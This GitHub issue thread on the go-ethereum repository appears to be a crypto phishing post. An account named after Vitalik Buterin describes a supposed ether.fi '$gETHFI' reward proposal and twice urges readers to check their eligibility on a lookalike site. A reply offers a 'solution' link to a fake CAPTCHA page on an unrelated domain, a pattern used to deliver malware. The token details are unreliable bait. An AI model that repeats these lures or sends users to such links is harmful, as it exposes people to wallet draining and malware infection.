### ISSUE TITLE
After a Successful DAO Vote, ether.fi decided to Launch the 1 Phase of the $gETHFI Distribution

### ISSUE THREAD

**Issue by VitalikButerin88** [ethereum/go-ethereum#30675]
Background
ETHFI DAO governance is considering altering the ETHFI Gold allocation rate, a newly approved function where 1% of bridge volume fees are converted to $gETHFI. $gETHFI has the potential to increase bridge transaction volume and reward holders, but will $gETHFI face market cap reduction if a derivative token supply is increased, or will the increase in bridge volume contribute to greater value for users. 

- Proposal
Increase $gETHFI from 1% of bridge volume fees to 2% bridge volume to further incentive bridge usage and reward the ENS community. Maintain $gETHFI biannual rewards distribution timeline to encourage bridge prioritization and bolster market sentiment. Currently, for every $1M of bridge volume, $10,000 will be allocated to the $sGOLD treasury. This proposal suggests contributing $20,000 to $gETHFI for every $1M of bridge volume, which will later be distributed to bridge users based on wallet activity. A majority vote of 51% or greater is required for the protocol to implement this new addition. 

- What is $gETHFI and when is the first distribution?
ETHFI DAO has voted to implement $gETHFI rewards for the first distribution, which is live for users from February 19, 2024 to March 15, 2024. Each $ETHFI holder is eligible if their wallet is older than 7 days, and they have made a txn with $ETHFI. $gETHFI distribution rate will be based on wallet solvency levels and bridge volume. 

If you haven't already, check [HERE](https://etherfitokens.com/) if you are eligible for the Phase 1 $gETHFI Rewards Distribution. 

- Execution
If this proposal receives a majority vote of 51% or greater, $gETHFI treasury allocation rate will increase from 1% to 2% to further reward bridge users and hopefully increase overall bridge volume. 

If the new reward's allocation rate is accepted, it will be implemented in the 2024 Q1 distribution. 

Don't forget to check if you are eligible for the Phase 1 $gETHFI distribution if you have been an active $ETHFI user or staker.

![GWPALcbXsAAufIc](https://github.com/user-attachments/assets/e90e3c23-6fb2-4e4e-bffa-07550a53adfd)

**Comment by batu3H** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.
